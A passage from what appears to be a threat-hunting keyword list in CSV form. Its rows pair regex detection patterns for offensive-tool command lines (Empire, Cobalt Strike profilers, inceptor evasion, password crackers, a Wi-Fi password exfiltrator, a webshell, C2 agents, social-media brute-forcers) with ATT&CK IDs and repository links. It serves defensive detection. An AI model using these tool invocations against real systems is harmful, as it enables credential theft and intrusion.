for use in GraphRunner*",".{0,1000}\sImport\stokens\sfrom\sother\stools\sfor\suse\sin\sGraphRunner.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "* -ImportDllPathPtr *",".{0,1000}\s\-ImportDllPathPtr\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* impress-remote-discover.nse*",".{0,1000}\simpress\-remote\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -inc -u=0 *.pwd*",".{0,1000}\s\-inc\s\-u\=0\s.{0,1000}\.pwd.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* -inc=digits *",".{0,1000}\s\-inc\=digits\s.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* inceptor.*dotnet*",".{0,1000}\sinceptor\..{0,1000}dotnet.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "* inceptor.py*",".{0,1000}\sinceptor\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense 
Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "* inceptor.py*",".{0,1000}\sinceptor\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "* inceptor.spec*",".{0,1000}\sinceptor\.spec.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "* --includeModules amass*",".{0,1000}\s\-\-includeModules\samass.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "* -InFile Wi-Fi-PASS*",".{0,1000}\s\-InFile\sWi\-Fi\-PASS.{0,1000}","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "* InflativeLoading.py*",".{0,1000}\sInflativeLoading\.py.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense 
Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "* informix-brute.nse*",".{0,1000}\sinformix\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* informix-query.nse*",".{0,1000}\sinformix\-query\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* informix-tables.nse*",".{0,1000}\sinformix\-tables\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -Injector NtMapViewOfSection*",".{0,1000}\s\-Injector\sNtMapViewOfSection.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","10","10","971","149","2024-04-02T20:12:17Z","2021-08-06T20:55:26Z" "* -Injector VirtualAllocEx*",".{0,1000}\s\-Injector\sVirtualAllocEx.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","10","10","971","149","2024-04-02T20:12:17Z","2021-08-06T20:55:26Z" "* --input 10m_usernames.txt*",".{0,1000}\s\-\-input\s10m_usernames\.txt.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","6","10","958","76","2024-02-19T18:12:13Z","2022-09-18T10:35:09Z" "* -InputPath .\TrustedForests.txt*",".{0,1000}\s\-InputPath\s\.\\TrustedForests\.txt.{0,1000}","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","0","N/A","8","7","685","65","2024-04-23T15:48:48Z","2022-04-28T01:37:32Z" "* --insecure brute --userpass 
*",".{0,1000}\s\-\-insecure\sbrute\s\-\-userpass\s.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "* --insecure brute --users *",".{0,1000}\s\-\-insecure\sbrute\s\-\-users\s.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "* instabf.py*",".{0,1000}\sinstabf\.py.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","0","N/A","7","1","47","10","2024-04-23T02:47:28Z","2020-11-20T22:22:48Z" "* instainsane.sh*",".{0,1000}\sinstainsane\.sh.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/umeshshinde19/instainsane","1","0","N/A","7","6","519","335","2024-02-11T10:29:05Z","2018-12-02T22:48:11Z" "* install *masscan*",".{0,1000}\sinstall\s.{0,1000}masscan.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. 
scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","22663","2991","2024-03-15T06:32:42Z","2013-07-28T05:35:33Z" "* install armitage*",".{0,1000}\sinstall\sarmitage.{0,1000}","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","0","N/A","N/A","2","110","24","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z" "* install arsenal-cli*",".{0,1000}\sinstall\sarsenal\-cli.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* install autobloody*",".{0,1000}\sinstall\sautobloody.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","378","43","2024-03-28T07:45:00Z","2022-09-07T13:34:30Z" "* install backdoor-factory*",".{0,1000}\sinstall\sbackdoor\-factory.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "* install chisel*",".{0,1000}\sinstall\schisel.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "* install dnscrypt-proxy*",".{0,1000}\sinstall\sdnscrypt\-proxy.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "* install evil-proxy*",".{0,1000}\sinstall\sevil\-proxy.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "* install evil-winrm*",".{0,1000}\sinstall\sevil\-winrm.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* install github *merlin*",".{0,1000}\sinstall\sgithub\s.{0,1000}merlin.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - 
T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","0","N/A","10","10","77","12","2024-04-24T13:23:09Z","2021-01-25T12:36:46Z" "* install gsocket*",".{0,1000}\sinstall\sgsocket.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "* install hekatomb*",".{0,1000}\sinstall\shekatomb.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users information. Then it will download all DPAPI blobs of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/Processus-Thief/HEKATOMB","1","0","N/A","10","6","N/A","N/A","N/A","N/A" "* install holehe*",".{0,1000}\sinstall\sholehe.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","6663","755","2024-04-10T07:34:29Z","2020-06-25T23:03:02Z" "* install iodine*",".{0,1000}\sinstall\siodine.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "* install krbjack*",".{0,1000}\sinstall\skrbjack.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","10","1","85","15","2024-02-08T18:07:25Z","2023-04-16T10:44:55Z" "* install nikto*",".{0,1000}\sinstall\snikto.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7885","1156","2024-05-01T02:01:39Z","2012-11-24T04:24:29Z" "* install samdump2*",".{0,1000}\sinstall\ssamdump2.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). 
Must be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","N/A","10","1","56","3","2024-04-19T17:11:22Z","2024-03-05T00:00:20Z" "* install tor2web*",".{0,1000}\sinstall\stor2web.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by means of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "* install wapiti3*",".{0,1000}\sinstall\swapiti3.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "* install wfuzz*",".{0,1000}\sinstall\swfuzz.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "* install wordlists*",".{0,1000}\sinstall\swordlists.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* install-sb.sh*",".{0,1000}\sinstall\-sb\.sh.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential 
Access","https://github.com/samsesh/SocialBox-Termux","1","0","N/A","7","10","2856","292","2024-03-24T09:16:18Z","2019-03-28T18:07:05Z" "* insTof.py*",".{0,1000}\sinsTof\.py.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","0","N/A","7","1","47","10","2024-04-23T02:47:28Z","2020-11-20T22:22:48Z" "* intel -d * -whois*",".{0,1000}\sintel\s\-d\s.{0,1000}\s\-whois.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "* interact -u http*://*/*.aspx -p *",".{0,1000}\sinteract\s\-u\shttp.{0,1000}\:\/\/.{0,1000}\/.{0,1000}\.aspx\s\-p\s.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "* interactive_shell.py*",".{0,1000}\sinteractive_shell\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* --interface * --analyze --disable-ess*",".{0,1000}\s\-\-interface\s.{0,1000}\s\-\-analyze\s\-\-disable\-ess.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --interface * --analyze --lm --disable-ess*",".{0,1000}\s\-\-interface\s.{0,1000}\s\-\-analyze\s\-\-lm\s\-\-disable\-ess.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* -Internalmonologue -Command *",".{0,1000}\s\-Internalmonologue\s\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* INTO LDAPHUNTERFINDINGS*",".{0,1000}\sINTO\sLDAPHUNTERFINDINGS.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","7","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "* Inveigh-*",".{0,1000}\sInveigh\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* Inveigh.ps1*",".{0,1000}\sInveigh\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* invoke admin-service -q *",".{0,1000}\sinvoke\sadmin\-service\s\-q\s.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "* invoke admin-service -q *",".{0,1000}\sinvoke\sadmin\-service\s\-q\s.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
